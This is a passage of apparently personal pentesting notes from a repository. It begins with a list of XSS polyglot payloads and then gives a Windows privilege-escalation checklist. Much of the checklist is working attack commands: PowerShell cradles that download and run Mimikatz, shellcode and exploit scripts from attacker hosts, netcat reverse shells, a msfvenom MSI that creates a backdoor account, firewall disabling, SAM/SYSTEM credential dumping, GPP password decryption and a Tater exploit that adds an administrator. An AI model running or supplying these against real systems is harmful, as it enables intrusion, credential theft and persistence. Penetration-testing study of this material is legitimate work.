';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT> 323 | ``` 324 | 325 | Polyglot XSS - Daniel Miessler 326 | 327 | ```javascript 328 | ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> 329 | “ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// 330 | '">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg"> 331 | javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/* 332 | javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a 333 | javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/ 334 | javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/* 335 | javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/* 336 | javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()// 337 | javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/* 338 | --></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/* 339 | /</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/* 340 | javascript://--></title></style></textarea></script><svg "//' onclick=alert()// 341 | /</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/* 342 | ``` 343 | 344 | Polyglot XSS - [@s0md3v](https://twitter.com/s0md3v/status/966175714302144514) 345 | ![https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg](https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg) 346 | 347 | ```javascript 348 | -->'"/></sCript><svG x=">" onload=(co\u006efirm)``> 349 | ``` 350 | 351 | ![https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large](https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large) 352 | 353 | ```javascript 354 | <svg%0Ao%00nload=%09((pro\u006dpt))()// 355 | ``` 356 | 357 | Polyglot XSS - from [@filedescriptor's Polyglot Challenge](http://polyglot.innerht.ml) 358 | 359 | ```javascript 360 | # by crlf 361 | javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//> 362 | 363 | # by europa 364 | javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/-->&lt;svg/onload=/*<html/*/onmouseover=alert()//> 365 | 366 | # by EdOverflow 367 | javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>-->&lt;svg onload=/*<html/*/onmouseover=alert()//> 368 | 369 | # by h1/ragnar 370 | javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template>&lt;svg/onload='/*--><html */ onmouseover=alert()//'>` 371 | ``` 372 | 373 | Reading: 374 | 375 | https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot 376 | 377 | https://www.exploit-db.com/papers/13646/ (This is an awesome paper) 378 | 379 | http://brutelogic.com.br/blog/probing-to-find-xss/ 380 | 381 | -------------------------------------------------------------------------------- /windows-privesc.md: -------------------------------------------------------------------------------- 1 | So this is my quick and dirty checklist for windows privilege escalation. It's mostly copied from the links at the bottom of the page. 2 | 3 | ### Initial Information Gathering 4 | 5 | This step is to understand a few things about the machine. Start with users/privileges, installed software, and what hotfixes are installed. 6 | 7 | What system are we connected to? 8 | ```cmd 9 | systeminfo | findstr /B /C:"OS Name" /C:"OS Version" 10 | ``` 11 | Get the hostname and username 12 | ```cmd 13 | whoami 14 | whoami /priv 15 | hostname 16 | echo %username% 17 | ``` 18 | Learn about your environment 19 | ```cmd 20 | SET 21 | echo %PATH% 22 | ``` 23 | List other users on the box and domain 24 | ```cmd 25 | qwinsta 26 | net users 27 | net accounts 28 | net user <username> 29 | dir /b /ad "C:\Users\" 30 | net localgroups 31 | Get-LocalGroup | ft Name 32 | net localgroup Administrators 33 | Get-LocalGroupMember Administrators | ft Name, PrincipalSource 34 | net group /domain 35 | net group /domain <Group Name> 36 | Get-LocalUser | ft Name,Enabled,LastLogon 37 | Get-ChildItem C:\Users -Force | select Name 38 | ``` 39 | Check installed software 40 | ```cmd 41 | dir /a "C:\Program Files" 42 | dir /a "C:\Program Files (x86)" 43 | reg query HKEY_LOCAL_MACHINE\SOFTWARE 44 | ``` 45 | List all drives 46 | ```cmd 47 | wmic logicaldisk get caption || fsutil fsinfo drives 48 | wmic logicaldisk get caption,description,providername 49 | Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root 50 | ``` 51 | How well patched is the machine? 52 | ```cmd 53 | wmic qfe get Caption,Description,HotFixID,InstalledOn 54 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.." - to find specific KBs 55 | ``` 56 | 57 | Do we want to run Invoke-Shellcode.ps1? 58 | ```powershell 59 | Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.22:8000/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost YourIPAddress -Lport 4444 -Force" 60 | ``` 61 | 62 | ### Kernel Exploits 63 | 64 | Here we want to run the Sherlock/Watson and PowerUp scripts to check for low hanging fruit and easy wins. The functions we want are Find-AllVulns and Invoke-AllChecks. You can just use the -encodedcommand flag and not deal with these quotes as well. 65 | 66 | https://github.com/rasta-mouse/Sherlock 67 | 68 | https://github.com/rasta-mouse/Watson 69 | 70 | https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1 71 | 72 | The normal way to run a powershell script using net webclient objects with no modifications. 73 | ```powershell 74 | powershell `IEX((new-object net.webclient).downloadstring('http://10.10.14.22:8000/Sherlock.ps1')); Find-AllVulns` 75 | powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks" 76 | powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');" 77 | ``` 78 | 79 | If we have a webshell or something non interactive try piping it to powershell and pulling from stdin like so. Thanks to Ippsec for showing this method. 80 | https://www.youtube.com/watch?v=lP-E5vmZNC0 81 | ```powershell 82 | echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.22:8000/Sherlock.ps1'); | powershell -noprofile - 83 | ``` 84 | Sometimes its easier to encode your PS commands into UTF/base64 like so... 85 | ```powershell 86 | powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');" | iconv --to-code UTF-16LE | base64 -w 0 87 | ``` 88 | Then just run it on your windows shell... 89 | ```powershell 90 | powershell -encodedcommand ADFSDGSDGSDGDSG== 91 | ``` 92 | 93 | Otherwise just upload it somewhere and execute these 94 | ```powershell 95 | powershell -nop -ep bypass 96 | Import-Module C:\Users\740i\Desktop\Sherlock.ps1 97 | Find-AllVulns 98 | ``` 99 | Compiling all these Windows exploits on Linux can really be a pain in the ass 100 | ```bash 101 | i686-w64-mingw32-gcc exploit.c -o exploit 102 | ``` 103 | or for 32 bit 104 | ```bash 105 | i686-w64-mingw32-gcc 40564.c -o 40564 -lws2_32 106 | ``` 107 | Precompiled windows exploits they seem safe... 108 | 109 | https://github.com/abatchy17/WindowsExploits 110 | 111 | https://github.com/SecWiki/windows-kernel-exploits 112 | 113 | 114 | 115 | 116 | 117 | 118 | ### Passwords and Interesting Files 119 | 120 | There might be cleartext, base64, or hashed passwords somewhere on the machine to find. Some of this will output a lot of garbage so maybe echo it into a file and look it over later. 121 | 122 | 123 | First look for regular file types containing the string password 124 | ```cmd 125 | findstr /si password *.xml *.ini *.txt *.config 2>nul 126 | cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt 127 | findstr /spin "password" *.* 128 | ``` 129 | 130 | Check .config or other interesting file types for those strings 131 | ```cmd 132 | dir /s *pass* == *cred* == *vnc* == *.config* 133 | dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* 134 | where /R C:\ user.txt 135 | where /R C:\ *.ini 136 | ``` 137 | 138 | Sometimes these get left behind and might have passwords inside them 139 | ```cmd 140 | c:\sysprep.inf 141 | c:\sysprep\sysprep.xml 142 | c:\unattend.xml 143 | %WINDIR%\Panther\Unattend\Unattended.xml 144 | %WINDIR%\Panther\Unattended.xml 145 | 146 | dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul 147 | ``` 148 | 149 | Is VNC installed? 150 | ```cmd 151 | dir c:\*vnc.ini /s /b 152 | dir c:\*ultravnc.ini /s /b 153 | dir c:\ /s /b | findstr /si *vnc.ini 154 | ``` 155 | 156 | Check the registry for SNMP, VNC, Putty, autologin and other passwords. 157 | ```cmd 158 | reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" 159 | reg query "HKCU\Software\ORL\WinVNC3\Password" 160 | reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" 161 | reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 162 | reg query HKLM /f password /t REG_SZ /s 163 | reg query HKCU /f password /t REG_SZ /s 164 | ``` 165 | 166 | Check for SAM and SYSTEM files access 167 | ```cmd 168 | %SYSTEMROOT%\repair\SAM 169 | %SYSTEMROOT%\System32\config\RegBack\SAM 170 | %SYSTEMROOT%\System32\config\SAM 171 | %SYSTEMROOT%\repair\system 172 | %SYSTEMROOT%\System32\config\SYSTEM 173 | %SYSTEMROOT%\System32\config\RegBack\system 174 | ``` 175 | Whats in inetpub if its there? web.config files might have passwords 176 | ```cmd 177 | dir /a C:\inetpub\ 178 | dir /s web.config 179 | C:\Windows\System32\inetsrv\config\applicationHost.config 180 | Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue 181 | ``` 182 | IIS and Apache logs? 183 | ```cmd 184 | dir /s access.log error.log 185 | C:\inetpub\logs\LogFiles\W3SVC1\u_ex[YYMMDD].log 186 | C:\inetpub\logs\LogFiles\W3SVC2\u_ex[YYMMDD].log 187 | C:\inetpub\logs\LogFiles\FTPSVC1\u_ex[YYMMDD].log 188 | C:\inetpub\logs\LogFiles\FTPSVC2\u_ex[YYMMDD].log 189 | ``` 190 | If XAMPP/WAMPP, Apache, or PHP is installed check the config files 191 | ``` 192 | dir /s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf 193 | ``` 194 | 195 | Check for stored creds with cmdkey 196 | ```cmd 197 | cmdkey /list 198 | ``` 199 | Then you can run something like this over SMB with any saved credientials 200 | ```cmd 201 | runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" 202 | ``` 203 | Or you can use runas and feed it credentials 204 | ```cmd 205 | C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe" 206 | ``` 207 | ```powershell 208 | $ secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force 209 | $ mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd) 210 | $ computer = "<hostname>" 211 | [System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer) 212 | ``` 213 | 214 | 215 | ### Networking 216 | 217 | Check the simple stuff... 218 | ```cmd 219 | ipconfig /all 220 | route print 221 | arp -a 222 | net share 223 | Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address 224 | Get-DnsClientServerAddress -AddressFamily IPv4 | ft 225 | Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex 226 | Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State 227 | ``` 228 | 229 | Some services might be open on the outside or the inside only of the network. Look for local address 127.0.0.1 or something internal. 230 | ```cmd 231 | netstat /a 232 | netstat -ano 233 | ``` 234 | So to expose SMB on a victim for example, upload plink.exe from /usr/share/windows-binaries, start SSH on attacker machine then on victim run 235 | ```cmd 236 | plink.exe -l root -pw password -R 445:127.0.0.1:445 YOURIPADDRESS 237 | ``` 238 | 239 | Firewall turned on? 240 | ```cmd 241 | netsh advfirewall firewall dump 242 | netsh firewall show state 243 | netsh firewall show config 244 | netsh firewall set opmode disable 245 | ``` 246 | List firewall's blocked ports 247 | 248 | ```powershell 249 | $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports 250 | ``` 251 | 252 | Enable RDP if you want 253 | ```cmd 254 | reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 255 | netsh firewall set service remoteadmin enable 256 | netsh firewall set service remotedesktop enable 257 | ``` 258 | ### Group Policy Preferences 259 | If the box is part of a domain and the user account you have can read System Volume Information, then check for files with passwords. Start by checking the environment variables for the IP-address of the domain controller if that's unclear. Output environment-variables by typing```set```and look for the following: 260 | ```cmd 261 | LOGONSERVER=\\NAMEOFSERVER 262 | USERDNSDOMAIN=WHATEVER.LOCAL 263 | ``` 264 | Then look up the IP-address 265 | ```cmd 266 | nslookup nameofserver.whatever.local 267 | ``` 268 | 269 | Now we mount it and search for the groups.xml file 270 | ```cmd 271 | net use z: \\192.168.1.101\SYSVOL 272 | z: 273 | dir Groups.xml /s 274 | ``` 275 | Then just decrypt any found passwords in kali with the gpp-decrypt tool. 276 | 277 | You can also do this with powerview and the get gpp-password scripts from powershell empire. 278 | https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1 279 | https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 280 | 281 | Here in powershell we load them into memory 282 | 283 | ```powershell 284 | IEX(New-Object Net.WebClient).DownloadString("http://10.0.0.100/Get-GPPPassword.ps1") 285 | IEX(New-Object Net.WebClient).DownloadString("http://10.0.0.100/powerview.ps1") 286 | ``` 287 | Then run ```Get-GPPPassword```and feed any listed GUID's setting administrator passwords to powerview.ps1 like so. This will check any found credentials against other domain machines. 288 | ```cmd 289 | Get-NetOU -GUID "{4C86DD57-4040-41CD-B163-58F208A26623}" | %{ Get-NetComputer -ADSPath $_ } 290 | ``` 291 | 292 | Check https://www.toshellandback.com/2015/08/30/gpp/ for some explanations. 293 | 294 | 295 | ### Scheduled Tasks 296 | 297 | Look for anything custom, run by a privileged user, and running a binary we can overwrite. Might be tons of output 298 | ```cmd 299 | schtasks /query /fo LIST 2>nul | findstr TaskName 300 | dir C:\windows\tasks 301 | ``` 302 | Or in powershell 303 | ```powershell 304 | Get-ScheduledTask | ft TaskName, State 305 | Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State 306 | ``` 307 | Check this file 308 | ```cmd 309 | c:\WINDOWS\SchedLgU.Txt 310 | ``` 311 | 312 | Startup tasks 313 | 314 | ```cmd 315 | wmic startup get caption,command 316 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R 317 | reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run 318 | reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 319 | dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 320 | dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 321 | ``` 322 | 323 | ### AlwaysInstallElevated 324 | 325 | Worth checking for... 326 | ```cmd 327 | reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 328 | reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 329 | ``` 330 | If those keys are set to enabled, then you can use msfvenom to generate a malicious MSI file and install it: 331 | ```bash 332 | $ msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi 333 | $ msiexec /quiet /qn /i C:\evil.msi 334 | ``` 335 | https://toshellandback.com/2015/11/24/ms-priv-esc/ has some more examples. 336 | 337 | 338 | ### Weak Service, Process, and Program Permissions 339 | Taken mostly from https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/ 340 | 341 | What is installed? 342 | ```cmd 343 | dir /a "C:\Program Files" 344 | dir /a "C:\Program Files (x86)" 345 | reg query HKEY_LOCAL_MACHINE\SOFTWARE 346 | ``` 347 | 348 | List processes running as SYSTEM 349 | ```cmd 350 | tasklist /FI "username eq SYSTEM" 351 | ``` 352 | 353 | Then check for weak folder or file permissions in a couple different ways as needed. 354 | 355 | Full Permissions in Program Files? 356 | ```cmd 357 | icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone" 358 | icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone" 359 | 360 | icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users" 361 | icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users" 362 | ``` 363 | 364 | Modify Permissions in Program Files? 365 | 366 | ```cmd 367 | icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone" 368 | icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone" 369 | 370 | icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users" 371 | icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users" 372 | ``` 373 | 374 | You can also use accesschk to check for weak folder and file permissions. https://github.com/ankh2054/windows-pentest/tree/master/Privelege has both versions 375 | ```cmd 376 | accesschk.exe /accepteula ... ... ... 377 | accesschk.exe -uwqs "Everyone" * 378 | accesschk.exe -uwqs "Authenticated Users" * 379 | accesschk.exe -uwqs "Users" * 380 | accesschk.exe -uwqs Users c:\*.* 381 | ``` 382 | Or just look for weak folders per drive 383 | ```cmd 384 | accesschk.exe -uwdqs Users c:\ 385 | accesschk.exe -uwdqs "Authenticated Users" c:\ 386 | ``` 387 | 388 | Weak service permissions that can be reconfigured? 389 | 390 | ```cmd 391 | accesschk.exe -uwcqv "Everyone" * 392 | accesschk.exe -uwcqv "Authenticated Users" * 393 | accesschk.exe -uwcqv "Users" * 394 | ``` 395 | 396 | Don't forget to look for any unquoted service paths 397 | 398 | ```cmd 399 | wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """ 400 | ``` 401 | Or do 402 | ```cmd 403 | echo %path% 404 | accesschk.exe -dqv "C:\Python27" 405 | ``` 406 | on any non default directories, often times you will find python here for example. 407 | 408 | 409 | 410 | ### MS16-032 Secondary Logon Handle 411 | 412 | This script by Fuzzysecurity is amazing https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1, but might need a few changes as you can either modify it to run your own specified binary or run as is to spawn a cmd shell, which sometimes doesn't work unless you already have an RDP session on the victim. The target also needs to have 2+ CPU cores so this will fail often on vm boxes. 413 | 414 | To check if the machine is patched 415 | ```cmd 416 | wmic qfe list | find "3139914" 417 | ``` 418 | 419 | First off to just run it as usual upload the script to the victim and do this 420 | ```powershell 421 | powershell -nop -ep bypass 422 | Import-Module C:\Users\Victim\Desktop\MS16-032.ps1 423 | Invoke-MS16-032 424 | ``` 425 | Or you can try running it remotely from a normal windows shell this may not work unless its over RDP. 426 | ```powershell 427 | powershell -c `iex ((new-object net.webclient).downloadstring('http://10.10.14.22:8000/Invoke-MS16-032.ps1')); Invoke-MS16-032` 428 | ``` 429 | 430 | To have it call something other than the cmd.exe payload, modify this path located in the middle of Fuzzysec's script. This seems to be reliable with any msf payload. 431 | ```powershell 432 | # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED 433 | $CallResult = [Advapi32]::CreateProcessWithLogonW( 434 | "user", "domain", "pass", 435 | 0x00000002, "C:\Users\740i\Desktop\danger.exe", "", 436 | 0x00000004, $null, $GetCurrentPath, 437 | [ref]$StartupInfo, [ref]$ProcessInfo) 438 | ``` 439 | There is also a custom binary from Meatballs that will just spawn a command prompt as system. https://github.com/Meatballs1/ms16-032 440 | 441 | The Powershell empire version will take a -Command flag that makes it easy to run it against another reverse shell or a local command to escalate privileges. 442 | https://github.com/EmpireProject/Empire/blob/master/data/module_source/privesc/Invoke-MS16032.ps1 443 | 444 | ```powershell 445 | powershell.exe -nop -ep bypass 446 | Import-Module C:\Users\740i\Desktop\Invoke-MS16032.ps1 447 | Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.22:8000/shell.ps1')" 448 | ``` 449 | 450 | 451 | ### Tater 452 | 453 | There's a few different implementations of this Hot Potato exploit, I've gotten lucky with the powershell version. 454 | https://github.com/Kevin-Robertson/Tater 455 | 456 | So all you do is download Tater.ps1 somewhere on the target then add administrator user or whatever. 457 | ```powershell 458 | powershell.exe -nop -ep bypass 459 | Import-Module C:\Users\740i\Desktop\Tater.ps1 460 | Invoke-Tater -Trigger 1 -Command "net localgroup administrators 740i /add" 461 | net localgroup administrators 462 | ``` 463 | 464 | 465 | 466 | ### System Files 467 | 468 | If you find an LFI on windows you should check for these two files, the `system` registry and the `SAM` registry. These two files/registries are all we need to get the machines hashes. 469 | ```cmd 470 | Systemroot can be windows 471 | %SYSTEMROOT%\repair\SAM 472 | windows\repair\SAM 473 | %SYSTEMROOT%\System32\config\RegBack\SAM 474 | 475 | System file can be found here 476 | SYSTEMROOT%\repair\system 477 | %SYSTEMROOT%\System32\config\RegBack\system 478 | ``` 479 | Then you can just run pwdump on these files. 480 | ```cmd 481 | pwdump system sam 482 | ``` 483 | 484 | List of file inclusions for Windows 485 | ```cmd 486 | C:\Apache\conf\httpd.conf 487 | C:\Apache\logs\access.log 488 | C:\Apache\logs\error.log 489 | C:\Apache2\conf\httpd.conf 490 | C:\Apache2\logs\access.log 491 | C:\Apache2\logs\error.log 492 | C:\Apache22\conf\httpd.conf 493 | C:\Apache22\logs\access.log 494 | C:\Apache22\logs\error.log 495 | C:\Apache24\conf\httpd.conf 496 | C:\Apache24\logs\access.log 497 | C:\Apache24\logs\error.log 498 | C:\Documents and Settings\Administrator\NTUser.dat 499 | C:\php\php.ini 500 | C:\php4\php.ini 501 | C:\php5\php.ini 502 | C:\php7\php.ini 503 | C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf 504 | C:\Program Files (x86)\Apache Group\Apache\logs\access.log 505 | C:\Program Files (x86)\Apache Group\Apache\logs\error.log 506 | C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf 507 | C:\Program Files (x86)\Apache Group\Apache2\logs\access.log 508 | C:\Program Files (x86)\Apache Group\Apache2\logs\error.log 509 | c:\Program Files (x86)\php\php.ini" 510 | C:\Program Files\Apache Group\Apache\conf\httpd.conf 511 | C:\Program Files\Apache Group\Apache\conf\logs\access.log 512 | C:\Program Files\Apache Group\Apache\conf\logs\error.log 513 | C:\Program Files\Apache Group\Apache2\conf\httpd.conf 514 | C:\Program Files\Apache Group\Apache2\conf\logs\access.log 515 | C:\Program Files\Apache Group\Apache2\conf\logs\error.log 516 | C:\Program Files\FileZilla Server\FileZilla Server.xml 517 | C:\Program Files\MySQL\my.cnf 518 | C:\Program Files\MySQL\my.ini 519 | C:\Program Files\MySQL\MySQL Server 5.0\my.cnf 520 | C:\Program Files\MySQL\MySQL Server 5.0\my.ini 521 | C:\Program Files\MySQL\MySQL Server 5.1\my.cnf 522 | C:\Program Files\MySQL\MySQL Server 5.1\my.ini 523 | C:\Program Files\MySQL\MySQL Server 5.5\my.cnf 524 | C:\Program Files\MySQL\MySQL Server 5.5\my.ini 525 | C:\Program Files\MySQL\MySQL Server 5.6\my.cnf 526 | C:\Program Files\MySQL\MySQL Server 5.6\my.ini 527 | C:\Program Files\MySQL\MySQL Server 5.7\my.cnf 528 | C:\Program Files\MySQL\MySQL Server 5.7\my.ini 529 | C:\Program Files\php\php.ini 530 | C:\Users\Administrator\NTUser.dat 531 | C:\Windows\debug\NetSetup.LOG 532 | C:\Windows\Panther\Unattend\Unattended.xml 533 | C:\Windows\Panther\Unattended.xml 534 | C:\Windows\php.ini 535 | C:\Windows\repair\SAM 536 | C:\Windows\repair\system 537 | C:\Windows\System32\config\AppEvent.evt 538 | C:\Windows\System32\config\RegBack\SAM 539 | C:\Windows\System32\config\RegBack\system 540 | C:\Windows\System32\config\SAM 541 | C:\Windows\System32\config\SecEvent.evt 542 | C:\Windows\System32\config\SysEvent.evt 543 | C:\Windows\System32\config\SYSTEM 544 | C:\Windows\System32\drivers\etc\hosts 545 | C:\Windows\System32\winevt\Logs\Application.evtx 546 | C:\Windows\System32\winevt\Logs\Security.evtx 547 | C:\Windows\System32\winevt\Logs\System.evtx 548 | C:\Windows\win.ini 549 | C:\xampp\apache\conf\extra\httpd-xampp.conf 550 | C:\xampp\apache\conf\httpd.conf 551 | C:\xampp\apache\logs\access.log 552 | C:\xampp\apache\logs\error.log 553 | C:\xampp\FileZillaFTP\FileZilla Server.xml 554 | C:\xampp\MercuryMail\MERCURY.INI 555 | C:\xampp\mysql\bin\my.ini 556 | C:\xampp\php\php.ini 557 | C:\xampp\security\webdav.htpasswd 558 | C:\xampp\sendmail\sendmail.ini 559 | C:\xampp\tomcat\conf\server.xml 560 | ``` 561 | 562 | ### Metasploit Post Modules 563 | 564 | Some useful post-modules to run against msf sessions and do some of this stuff automatically... 565 | ```bash 566 | use exploit/windows/local/service_permissions 567 | post/windows/gather/credentials/gpp 568 | run post/windows/gather/credential_collector 569 | run post/multi/recon/local_exploit_suggester 570 | run post/windows/gather/enum_shares 571 | run post/windows/gather/enum_snmp 572 | run post/windows/gather/enum_applications 573 | run post/windows/gather/enum_logged_on_users 574 | run post/windows/gather/checkvm 575 | ``` 576 | 577 | ### Handy Scripts 578 | 579 | https://github.com/enjoiz/Privesc 580 | 581 | https://github.com/rasta-mouse/Sherlock 582 | 583 | https://github.com/FuzzySecurity/PowerShell-Suite 584 | 585 | https://github.com/411Hall/JAWS 586 | 587 | 588 | ### Links 589 | 590 | Thanks to these guys for all the work 591 | 592 | http://www.fuzzysecurity.com/tutorials/16.html 593 | 594 | https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/ 595 | 596 | https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md 597 | 598 | https://github.com/swisskyrepo/PayloadsAllTheThings 599 | 600 | http://www.greyhathacker.net/?p=738 601 | 602 | https://toshellandback.com/2015/11/24/ms-priv-esc/ 603 | 604 | https://www.toshellandback.com/2015/08/30/gpp/ 605 | 606 | https://www.youtube.com/watch?v=kMG8IsCohHA 607 | 608 | https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ 609 | 610 | https://github.com/sagishahar/lpeworkshop 611 | 612 | https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA 613 | 614 | https://bitvijays.github.io/ 615 | 616 | 617 | --------------------------------------------------------------------------------